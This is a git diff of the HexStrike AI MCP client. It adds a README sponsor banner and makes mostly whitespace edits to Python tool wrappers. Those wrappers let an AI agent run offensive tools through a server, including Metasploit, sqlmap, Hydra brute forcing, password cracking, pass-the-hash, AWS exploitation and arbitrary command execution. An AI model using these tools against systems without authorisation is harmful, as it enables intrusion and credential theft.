diff --git a/README.md b/README.md index f6d4ea0..1911379 100644 --- a/README.md +++ b/README.md @@ -36,6 +36,28 @@

+## Official Sponsor + +

+ Sponsored By LeaksAPI - Live Dark Web Data leak checker +

+ +

+ + LeaksAPI Logo + +      + + LeaksAPI Banner + +

+ +

+ + Visit leak-check.net + +

+ --- diff --git a/assets/leaksapi-banner.png b/assets/leaksapi-banner.png new file mode 100644 index 0000000..4256d7d Binary files /dev/null and b/assets/leaksapi-banner.png differ diff --git a/assets/leaksapi-logo.png b/assets/leaksapi-logo.png new file mode 100644 index 0000000..310cf56 Binary files /dev/null and b/assets/leaksapi-logo.png differ diff --git a/hexstrike_mcp.py b/hexstrike_mcp.py index 16ae2f7..23b083b 100644 --- a/hexstrike_mcp.py +++ b/hexstrike_mcp.py @@ -30,7 +30,7 @@ from mcp.server.fastmcp import FastMCP class HexStrikeColors: """Enhanced color palette matching the server's ModernVisualEngine.COLORS""" - + # Basic colors (for backward compatibility) RED = '\033[91m' GREEN = '\033[92m' @@ -39,7 +39,7 @@ class HexStrikeColors: MAGENTA = '\033[95m' CYAN = '\033[96m' WHITE = '\033[97m' - + # Core enhanced colors MATRIX_GREEN = '\033[38;5;46m' NEON_BLUE = '\033[38;5;51m' @@ -51,7 +51,7 @@ class HexStrikeColors: RESET = '\033[0m' BOLD = '\033[1m' DIM = '\033[2m' - + # Enhanced reddish tones and highlighting colors BLOOD_RED = '\033[38;5;124m' CRIMSON = '\033[38;5;160m' @@ -61,14 +61,14 @@ class HexStrikeColors: BURGUNDY = '\033[38;5;52m' SCARLET = '\033[38;5;197m' RUBY = '\033[38;5;161m' - + # Highlighting colors HIGHLIGHT_RED = '\033[48;5;196m\033[38;5;15m' # Red background, white text HIGHLIGHT_YELLOW = '\033[48;5;226m\033[38;5;16m' # Yellow background, black text HIGHLIGHT_GREEN = '\033[48;5;46m\033[38;5;16m' # Green background, black text HIGHLIGHT_BLUE = '\033[48;5;51m\033[38;5;16m' # Blue background, black text HIGHLIGHT_PURPLE = '\033[48;5;129m\033[38;5;15m' # Purple background, white text - + # Status colors with reddish tones SUCCESS = '\033[38;5;46m' # Bright green WARNING = '\033[38;5;208m' # Orange @@ -76,14 +76,14 @@ class HexStrikeColors: CRITICAL = '\033[48;5;196m\033[38;5;15m\033[1m' # Red background, white bold text INFO = '\033[38;5;51m' # Cyan DEBUG = '\033[38;5;240m' # Gray - + # Vulnerability severity colors VULN_CRITICAL = '\033[48;5;124m\033[38;5;15m\033[1m' # Dark red background VULN_HIGH = '\033[38;5;196m\033[1m' # Bright red bold VULN_MEDIUM = '\033[38;5;208m\033[1m' # Orange bold VULN_LOW = '\033[38;5;226m' # Yellow VULN_INFO = '\033[38;5;51m' # Cyan - + # Tool status colors TOOL_RUNNING = '\033[38;5;46m\033[5m' # Blinking green TOOL_SUCCESS = '\033[38;5;46m\033[1m' # Bold green @@ -96,7 +96,7 @@ Colors = HexStrikeColors class ColoredFormatter(logging.Formatter): """Enhanced formatter with colors and emojis for MCP client - matches server styling""" - + COLORS = { 'DEBUG': HexStrikeColors.DEBUG, 'INFO': HexStrikeColors.SUCCESS, @@ -104,7 +104,7 @@ class ColoredFormatter(logging.Formatter): 'ERROR': HexStrikeColors.ERROR, 'CRITICAL': HexStrikeColors.CRITICAL } - + EMOJIS = { 'DEBUG': '๐Ÿ”', 'INFO': 'โœ…', @@ -112,11 +112,11 @@ class ColoredFormatter(logging.Formatter): 'ERROR': 'โŒ', 'CRITICAL': '๐Ÿ”ฅ' } - + def format(self, record): emoji = self.EMOJIS.get(record.levelname, '๐Ÿ“') color = self.COLORS.get(record.levelname, HexStrikeColors.BRIGHT_WHITE) - + # Add color and emoji to the message record.msg = f"{color}{emoji} {record.msg}{HexStrikeColors.RESET}" return super().format(record) @@ -146,11 +146,11 @@ MAX_RETRIES = 3 # Maximum number of retries for connection attempts class HexStrikeClient: """Enhanced client for communicating with the HexStrike AI API Server""" - + def __init__(self, server_url: str, timeout: int = DEFAULT_REQUEST_TIMEOUT): """ Initialize the HexStrike AI Client - + Args: server_url: URL of the HexStrike AI API Server timeout: Request timeout in seconds @@ -158,7 +158,7 @@ class HexStrikeClient: self.server_url = server_url.rstrip("/") self.timeout = timeout self.session = requests.Session() - + # Try to connect to server with retries connected = False for i in range(MAX_RETRIES): @@ -183,20 +183,20 @@ class HexStrikeClient: except Exception as e: logger.warning(f"โŒ Connection attempt {i+1} failed: {str(e)}") time.sleep(2) # Wait before retrying - + if not connected: error_msg = f"Failed to establish connection to HexStrike AI API Server at {server_url} after {MAX_RETRIES} attempts" logger.error(error_msg) # We'll continue anyway to allow the MCP server to start, but tools will likely fail - + def safe_get(self, endpoint: str, params: Optional[Dict[str, Any]] = None) -> Dict[str, Any]: """ Perform a GET request with optional query parameters. - + Args: endpoint: API endpoint path (without leading slash) params: Optional query parameters - + Returns: Response data as dictionary """ @@ -220,16 +220,16 @@ class HexStrikeClient: def safe_post(self, endpoint: str, json_data: Dict[str, Any]) -> Dict[str, Any]: """ Perform a POST request with JSON data. - + Args: endpoint: API endpoint path (without leading slash) json_data: JSON data to send - + Returns: Response data as dictionary """ url = f"{self.server_url}/{endpoint}" - + try: logger.debug(f"๐Ÿ“ก POST {url} with data: {json_data}") response = self.session.post(url, json=json_data, timeout=self.timeout) @@ -245,20 +245,20 @@ class HexStrikeClient: def execute_command(self, command: str, use_cache: bool = True) -> Dict[str, Any]: """ Execute a generic command on the HexStrike server - + Args: command: Command to execute use_cache: Whether to use caching for this command - + Returns: Command execution results """ return self.safe_post("api/command", {"command": command, "use_cache": use_cache}) - + def check_health(self) -> Dict[str, Any]: """ Check the health of the HexStrike AI API Server - + Returns: Health status information """ @@ -267,30 +267,30 @@ class HexStrikeClient: def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: """ Set up the MCP server with all enhanced tool functions - + Args: hexstrike_client: Initialized HexStrikeClient - + Returns: Configured FastMCP instance """ mcp = FastMCP("hexstrike-ai-mcp") - + # ============================================================================ # CORE NETWORK SCANNING TOOLS # ============================================================================ - + @mcp.tool() def nmap_scan(target: str, scan_type: str = "-sV", ports: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute an enhanced Nmap scan against a target with real-time logging. - + Args: target: The IP address or hostname to scan scan_type: Scan type (e.g., -sV for version detection, -sC for scripts) ports: Comma-separated list of ports or port ranges additional_args: Additional Nmap arguments - + Returns: Scan results with enhanced telemetry """ @@ -301,14 +301,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "additional_args": additional_args } logger.info(f"{HexStrikeColors.FIRE_RED}๐Ÿ” Initiating Nmap scan: {target}{HexStrikeColors.RESET}") - + # Use enhanced error handling by default data["use_recovery"] = True result = hexstrike_client.safe_post("api/tools/nmap", data) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Nmap scan completed successfully for {target}{HexStrikeColors.RESET}") - + # Check for recovery information if result.get("recovery_info", {}).get("recovery_applied"): recovery_info = result["recovery_info"] @@ -316,24 +316,24 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Recovery applied: {attempts} attempts made {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Nmap scan failed for {target}{HexStrikeColors.RESET}") - + # Check for human escalation if result.get("human_escalation"): logger.error(f"{HexStrikeColors.CRITICAL} HUMAN ESCALATION REQUIRED {HexStrikeColors.RESET}") - + return result @mcp.tool() def gobuster_scan(url: str, mode: str = "dir", wordlist: str = "/usr/share/wordlists/dirb/common.txt", additional_args: str = "") -> Dict[str, Any]: """ Execute Gobuster to find directories, DNS subdomains, or virtual hosts with enhanced logging. - + Args: url: The target URL mode: Scan mode (dir, dns, fuzz, vhost) wordlist: Path to wordlist file additional_args: Additional Gobuster arguments - + Returns: Scan results with enhanced telemetry """ @@ -344,14 +344,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "additional_args": additional_args } logger.info(f"{HexStrikeColors.CRIMSON}๐Ÿ“ Starting Gobuster {mode} scan: {url}{HexStrikeColors.RESET}") - + # Use enhanced error handling by default data["use_recovery"] = True result = hexstrike_client.safe_post("api/tools/gobuster", data) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Gobuster scan completed for {url}{HexStrikeColors.RESET}") - + # Check for recovery information if result.get("recovery_info", {}).get("recovery_applied"): recovery_info = result["recovery_info"] @@ -359,26 +359,26 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Recovery applied: {attempts} attempts made {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Gobuster scan failed for {url}{HexStrikeColors.RESET}") - + # Check for alternative tool suggestion if result.get("alternative_tool_suggested"): alt_tool = result["alternative_tool_suggested"] logger.info(f"{HexStrikeColors.HIGHLIGHT_BLUE} Alternative tool suggested: {alt_tool} {HexStrikeColors.RESET}") - + return result @mcp.tool() def nuclei_scan(target: str, severity: str = "", tags: str = "", template: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Nuclei vulnerability scanner with enhanced logging and real-time progress. - + Args: target: The target URL or IP severity: Filter by severity (critical,high,medium,low,info) tags: Filter by tags (e.g. cve,rce,lfi) template: Custom template path additional_args: Additional Nuclei arguments - + Returns: Scan results with discovered vulnerabilities and telemetry """ @@ -390,20 +390,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "additional_args": additional_args } logger.info(f"{HexStrikeColors.BLOOD_RED}๐Ÿ”ฌ Starting Nuclei vulnerability scan: {target}{HexStrikeColors.RESET}") - + # Use enhanced error handling by default data["use_recovery"] = True result = hexstrike_client.safe_post("api/tools/nuclei", data) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Nuclei scan completed for {target}{HexStrikeColors.RESET}") - + # Enhanced vulnerability reporting if result.get("stdout") and "CRITICAL" in result["stdout"]: logger.warning(f"{HexStrikeColors.CRITICAL} CRITICAL vulnerabilities detected! {HexStrikeColors.RESET}") elif result.get("stdout") and "HIGH" in result["stdout"]: logger.warning(f"{HexStrikeColors.FIRE_RED} HIGH severity vulnerabilities found! {HexStrikeColors.RESET}") - + # Check for recovery information if result.get("recovery_info", {}).get("recovery_applied"): recovery_info = result["recovery_info"] @@ -411,18 +411,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Recovery applied: {attempts} attempts made {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Nuclei scan failed for {target}{HexStrikeColors.RESET}") - + return result # ============================================================================ # CLOUD SECURITY TOOLS # ============================================================================ - + @mcp.tool() def prowler_scan(provider: str = "aws", profile: str = "default", region: str = "", checks: str = "", output_dir: str = "/tmp/prowler_output", output_format: str = "json", additional_args: str = "") -> Dict[str, Any]: """ Execute Prowler for comprehensive cloud security assessment. - + Args: provider: Cloud provider (aws, azure, gcp) profile: AWS profile to use @@ -431,7 +431,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: output_dir: Directory to save results output_format: Output format (json, csv, html) additional_args: Additional Prowler arguments - + Returns: Cloud security assessment results """ @@ -456,7 +456,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def trivy_scan(scan_type: str = "image", target: str = "", output_format: str = "json", severity: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Trivy for container and filesystem vulnerability scanning. - + Args: scan_type: Type of scan (image, fs, repo, config) target: Target to scan (image name, directory, repository) @@ -464,7 +464,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: severity: Severity filter (UNKNOWN,LOW,MEDIUM,HIGH,CRITICAL) output_file: File to save results additional_args: Additional Trivy arguments - + Returns: Vulnerability scan results """ @@ -489,12 +489,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ @mcp.tool() - def scout_suite_assessment(provider: str = "aws", profile: str = "default", - report_dir: str = "/tmp/scout-suite", services: str = "", + def scout_suite_assessment(provider: str = "aws", profile: str = "default", + report_dir: str = "/tmp/scout-suite", services: str = "", exceptions: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Scout Suite for multi-cloud security assessment. - + Args: provider: Cloud provider (aws, azure, gcp, aliyun, oci) profile: AWS profile to use @@ -502,7 +502,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: services: Specific services to assess exceptions: Exceptions file path additional_args: Additional Scout Suite arguments - + Returns: Multi-cloud security assessment results """ @@ -523,17 +523,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def cloudmapper_analysis(action: str = "collect", account: str = "", + def cloudmapper_analysis(action: str = "collect", account: str = "", config: str = "config.json", additional_args: str = "") -> Dict[str, Any]: """ Execute CloudMapper for AWS network visualization and security analysis. - + Args: action: Action to perform (collect, prepare, webserver, find_admins, etc.) account: AWS account to analyze config: Configuration file path additional_args: Additional CloudMapper arguments - + Returns: AWS network visualization and security analysis results """ @@ -552,19 +552,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def pacu_exploitation(session_name: str = "hexstrike_session", modules: str = "", - data_services: str = "", regions: str = "", + def pacu_exploitation(session_name: str = "hexstrike_session", modules: str = "", + data_services: str = "", regions: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Pacu for AWS exploitation framework. - + Args: session_name: Pacu session name modules: Comma-separated list of modules to run data_services: Data services to enumerate regions: AWS regions to target additional_args: Additional Pacu arguments - + Returns: AWS exploitation framework results """ @@ -584,12 +584,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def kube_hunter_scan(target: str = "", remote: str = "", cidr: str = "", - interface: str = "", active: bool = False, report: str = "json", + def kube_hunter_scan(target: str = "", remote: str = "", cidr: str = "", + interface: str = "", active: bool = False, report: str = "json", additional_args: str = "") -> Dict[str, Any]: """ Execute kube-hunter for Kubernetes penetration testing. - + Args: target: Specific target to scan remote: Remote target to scan @@ -598,7 +598,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: active: Enable active hunting (potentially harmful) report: Report format (json, yaml) additional_args: Additional kube-hunter arguments - + Returns: Kubernetes penetration testing results """ @@ -620,18 +620,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def kube_bench_cis(targets: str = "", version: str = "", config_dir: str = "", + def kube_bench_cis(targets: str = "", version: str = "", config_dir: str = "", output_format: str = "json", additional_args: str = "") -> Dict[str, Any]: """ Execute kube-bench for CIS Kubernetes benchmark checks. - + Args: targets: Targets to check (master, node, etcd, policies) version: Kubernetes version config_dir: Configuration directory output_format: Output format (json, yaml) additional_args: Additional kube-bench arguments - + Returns: CIS Kubernetes benchmark results """ @@ -651,18 +651,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def docker_bench_security_scan(checks: str = "", exclude: str = "", - output_file: str = "/tmp/docker-bench-results.json", + def docker_bench_security_scan(checks: str = "", exclude: str = "", + output_file: str = "/tmp/docker-bench-results.json", additional_args: str = "") -> Dict[str, Any]: """ Execute Docker Bench for Security for Docker security assessment. - + Args: checks: Specific checks to run exclude: Checks to exclude output_file: Output file path additional_args: Additional Docker Bench arguments - + Returns: Docker security assessment results """ @@ -681,17 +681,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def clair_vulnerability_scan(image: str, config: str = "/etc/clair/config.yaml", + def clair_vulnerability_scan(image: str, config: str = "/etc/clair/config.yaml", output_format: str = "json", additional_args: str = "") -> Dict[str, Any]: """ Execute Clair for container vulnerability analysis. - + Args: image: Container image to scan config: Clair configuration file output_format: Output format (json, yaml) additional_args: Additional Clair arguments - + Returns: Container vulnerability analysis results """ @@ -710,19 +710,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def falco_runtime_monitoring(config_file: str = "/etc/falco/falco.yaml", - rules_file: str = "", output_format: str = "json", + def falco_runtime_monitoring(config_file: str = "/etc/falco/falco.yaml", + rules_file: str = "", output_format: str = "json", duration: int = 60, additional_args: str = "") -> Dict[str, Any]: """ Execute Falco for runtime security monitoring. - + Args: config_file: Falco configuration file rules_file: Custom rules file output_format: Output format (json, text) duration: Monitoring duration in seconds additional_args: Additional Falco arguments - + Returns: Runtime security monitoring results """ @@ -742,12 +742,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def checkov_iac_scan(directory: str = ".", framework: str = "", check: str = "", - skip_check: str = "", output_format: str = "json", + def checkov_iac_scan(directory: str = ".", framework: str = "", check: str = "", + skip_check: str = "", output_format: str = "json", additional_args: str = "") -> Dict[str, Any]: """ Execute Checkov for infrastructure as code security scanning. - + Args: directory: Directory to scan framework: Framework to scan (terraform, cloudformation, kubernetes, etc.) @@ -755,7 +755,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: skip_check: Check to skip output_format: Output format (json, yaml, cli) additional_args: Additional Checkov arguments - + Returns: Infrastructure as code security scanning results """ @@ -776,12 +776,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def terrascan_iac_scan(scan_type: str = "all", iac_dir: str = ".", - policy_type: str = "", output_format: str = "json", + def terrascan_iac_scan(scan_type: str = "all", iac_dir: str = ".", + policy_type: str = "", output_format: str = "json", severity: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Terrascan for infrastructure as code security scanning. - + Args: scan_type: Type of scan (all, terraform, k8s, etc.) iac_dir: Infrastructure as code directory @@ -789,7 +789,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: output_format: Output format (json, yaml, xml) severity: Severity filter (high, medium, low) additional_args: Additional Terrascan arguments - + Returns: Infrastructure as code security scanning results """ @@ -812,17 +812,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # FILE OPERATIONS & PAYLOAD GENERATION # ============================================================================ - + @mcp.tool() def create_file(filename: str, content: str, binary: bool = False) -> Dict[str, Any]: """ Create a file with specified content on the HexStrike server. - + Args: filename: Name of the file to create content: Content to write to the file binary: Whether the content is binary data - + Returns: File creation results """ @@ -843,12 +843,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def modify_file(filename: str, content: str, append: bool = False) -> Dict[str, Any]: """ Modify an existing file on the HexStrike server. - + Args: filename: Name of the file to modify content: Content to write or append append: Whether to append to the file (True) or overwrite (False) - + Returns: File modification results """ @@ -869,10 +869,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def delete_file(filename: str) -> Dict[str, Any]: """ Delete a file or directory on the HexStrike server. - + Args: filename: Name of the file or directory to delete - + Returns: File deletion results """ @@ -891,10 +891,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def list_files(directory: str = ".") -> Dict[str, Any]: """ List files in a directory on the HexStrike server. - + Args: directory: Directory to list (relative to server's base directory) - + Returns: Directory listing results """ @@ -911,13 +911,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def generate_payload(payload_type: str = "buffer", size: int = 1024, pattern: str = "A", filename: str = "") -> Dict[str, Any]: """ Generate large payloads for testing and exploitation. - + Args: payload_type: Type of payload (buffer, cyclic, random) size: Size of the payload in bytes pattern: Pattern to use for buffer payloads filename: Custom filename (auto-generated if empty) - + Returns: Payload generation results """ @@ -928,7 +928,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } if filename: data["filename"] = filename - + logger.info(f"๐ŸŽฏ Generating {payload_type} payload: {size} bytes") result = hexstrike_client.safe_post("api/payloads/generate", data) if result.get("success"): @@ -940,16 +940,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # PYTHON ENVIRONMENT MANAGEMENT # ============================================================================ - + @mcp.tool() def install_python_package(package: str, env_name: str = "default") -> Dict[str, Any]: """ Install a Python package in a virtual environment on the HexStrike server. - + Args: package: Name of the Python package to install env_name: Name of the virtual environment - + Returns: Package installation results """ @@ -969,12 +969,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def execute_python_script(script: str, env_name: str = "default", filename: str = "") -> Dict[str, Any]: """ Execute a Python script in a virtual environment on the HexStrike server. - + Args: script: Python script content to execute env_name: Name of the virtual environment filename: Custom script filename (auto-generated if empty) - + Returns: Script execution results """ @@ -984,7 +984,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } if filename: data["filename"] = filename - + logger.info(f"๐Ÿ Executing Python script in env {env_name}") result = hexstrike_client.safe_post("api/python/execute", data) if result.get("success"): @@ -1001,12 +1001,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def dirb_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", additional_args: str = "") -> Dict[str, Any]: """ Execute Dirb for directory brute forcing with enhanced logging. - + Args: url: The target URL wordlist: Path to wordlist file additional_args: Additional Dirb arguments - + Returns: Scan results with enhanced telemetry """ @@ -1027,11 +1027,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def nikto_scan(target: str, additional_args: str = "") -> Dict[str, Any]: """ Execute Nikto web vulnerability scanner with enhanced logging. - + Args: target: The target URL or IP additional_args: Additional Nikto arguments - + Returns: Scan results with discovered vulnerabilities """ @@ -1051,12 +1051,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def sqlmap_scan(url: str, data: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute SQLMap for SQL injection testing with enhanced logging. - + Args: url: The target URL data: POST data for testing additional_args: Additional SQLMap arguments - + Returns: SQL injection test results """ @@ -1077,11 +1077,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def metasploit_run(module: str, options: Dict[str, Any] = {}) -> Dict[str, Any]: """ Execute a Metasploit module with enhanced logging. - + Args: module: The Metasploit module to use options: Dictionary of module options - + Returns: Metasploit execution results """ @@ -1109,7 +1109,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: ) -> Dict[str, Any]: """ Execute Hydra for password brute forcing with enhanced logging. - + Args: target: The target IP or hostname service: The service to attack (ssh, ftp, http, etc.) @@ -1118,7 +1118,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: password: Single password to test password_file: File containing passwords additional_args: Additional Hydra arguments - + Returns: Brute force attack results """ @@ -1148,13 +1148,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: ) -> Dict[str, Any]: """ Execute John the Ripper for password cracking with enhanced logging. - + Args: hash_file: File containing password hashes wordlist: Wordlist file to use format_type: Hash format type additional_args: Additional John arguments - + Returns: Password cracking results """ @@ -1176,11 +1176,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def wpscan_analyze(url: str, additional_args: str = "") -> Dict[str, Any]: """ Execute WPScan for WordPress vulnerability scanning with enhanced logging. - + Args: url: The WordPress site URL additional_args: Additional WPScan arguments - + Returns: WordPress vulnerability scan results """ @@ -1200,11 +1200,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def enum4linux_scan(target: str, additional_args: str = "-a") -> Dict[str, Any]: """ Execute Enum4linux for SMB enumeration with enhanced logging. - + Args: target: The target IP address additional_args: Additional Enum4linux arguments - + Returns: SMB enumeration results """ @@ -1224,14 +1224,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def ffuf_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", mode: str = "directory", match_codes: str = "200,204,301,302,307,401,403", additional_args: str = "") -> Dict[str, Any]: """ Execute FFuf for web fuzzing with enhanced logging. - + Args: url: The target URL wordlist: Wordlist file to use mode: Fuzzing mode (directory, vhost, parameter) match_codes: HTTP status codes to match additional_args: Additional FFuf arguments - + Returns: Web fuzzing results """ @@ -1254,7 +1254,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def netexec_scan(target: str, protocol: str = "smb", username: str = "", password: str = "", hash_value: str = "", module: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute NetExec (formerly CrackMapExec) for network enumeration with enhanced logging. - + Args: target: The target IP or network protocol: Protocol to use (smb, ssh, winrm, etc.) @@ -1263,7 +1263,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: hash_value: Hash for pass-the-hash attacks module: NetExec module to execute additional_args: Additional NetExec arguments - + Returns: Network enumeration results """ @@ -1288,12 +1288,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def amass_scan(domain: str, mode: str = "enum", additional_args: str = "") -> Dict[str, Any]: """ Execute Amass for subdomain enumeration with enhanced logging. - + Args: domain: The target domain mode: Amass mode (enum, intel, viz) additional_args: Additional Amass arguments - + Returns: Subdomain enumeration results """ @@ -1314,7 +1314,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def hashcat_crack(hash_file: str, hash_type: str, attack_mode: str = "0", wordlist: str = "/usr/share/wordlists/rockyou.txt", mask: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Hashcat for advanced password cracking with enhanced logging. - + Args: hash_file: File containing password hashes hash_type: Hash type number for Hashcat @@ -1322,7 +1322,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: wordlist: Wordlist file for dictionary attacks mask: Mask for mask attacks additional_args: Additional Hashcat arguments - + Returns: Password cracking results """ @@ -1346,13 +1346,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def subfinder_scan(domain: str, silent: bool = True, all_sources: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Subfinder for passive subdomain enumeration with enhanced logging. - + Args: domain: The target domain silent: Run in silent mode all_sources: Use all sources additional_args: Additional Subfinder arguments - + Returns: Passive subdomain enumeration results """ @@ -1374,14 +1374,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def smbmap_scan(target: str, username: str = "", password: str = "", domain: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute SMBMap for SMB share enumeration with enhanced logging. - + Args: target: The target IP address username: Username for authentication password: Password for authentication domain: Domain for authentication additional_args: Additional SMBMap arguments - + Returns: SMB share enumeration results """ @@ -1405,12 +1405,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ @mcp.tool() - def rustscan_fast_scan(target: str, ports: str = "", ulimit: int = 5000, - batch_size: int = 4500, timeout: int = 1500, + def rustscan_fast_scan(target: str, ports: str = "", ulimit: int = 5000, + batch_size: int = 4500, timeout: int = 1500, scripts: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Rustscan for ultra-fast port scanning with enhanced logging. - + Args: target: The target IP address or hostname ports: Specific ports to scan (e.g., "22,80,443") @@ -1419,7 +1419,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: timeout: Timeout in milliseconds scripts: Run Nmap scripts on discovered ports additional_args: Additional Rustscan arguments - + Returns: Ultra-fast port scanning results """ @@ -1441,12 +1441,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def masscan_high_speed(target: str, ports: str = "1-65535", rate: int = 1000, - interface: str = "", router_mac: str = "", source_ip: str = "", + def masscan_high_speed(target: str, ports: str = "1-65535", rate: int = 1000, + interface: str = "", router_mac: str = "", source_ip: str = "", banners: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Masscan for high-speed Internet-scale port scanning with intelligent rate limiting. - + Args: target: The target IP address or CIDR range ports: Port range to scan @@ -1456,7 +1456,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: source_ip: Source IP address banners: Enable banner grabbing additional_args: Additional Masscan arguments - + Returns: High-speed port scanning results with intelligent rate limiting """ @@ -1479,13 +1479,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def nmap_advanced_scan(target: str, scan_type: str = "-sS", ports: str = "", - timing: str = "T4", nse_scripts: str = "", os_detection: bool = False, - version_detection: bool = False, aggressive: bool = False, + def nmap_advanced_scan(target: str, scan_type: str = "-sS", ports: str = "", + timing: str = "T4", nse_scripts: str = "", os_detection: bool = False, + version_detection: bool = False, aggressive: bool = False, stealth: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute advanced Nmap scans with custom NSE scripts and optimized timing. - + Args: target: The target IP address or hostname scan_type: Nmap scan type (e.g., -sS, -sT, -sU) @@ -1497,7 +1497,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: aggressive: Enable aggressive scanning stealth: Enable stealth mode additional_args: Additional Nmap arguments - + Returns: Advanced Nmap scanning results with custom NSE scripts """ @@ -1522,13 +1522,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def autorecon_comprehensive(target: str, output_dir: str = "/tmp/autorecon", - port_scans: str = "top-100-ports", service_scans: str = "default", - heartbeat: int = 60, timeout: int = 300, + def autorecon_comprehensive(target: str, output_dir: str = "/tmp/autorecon", + port_scans: str = 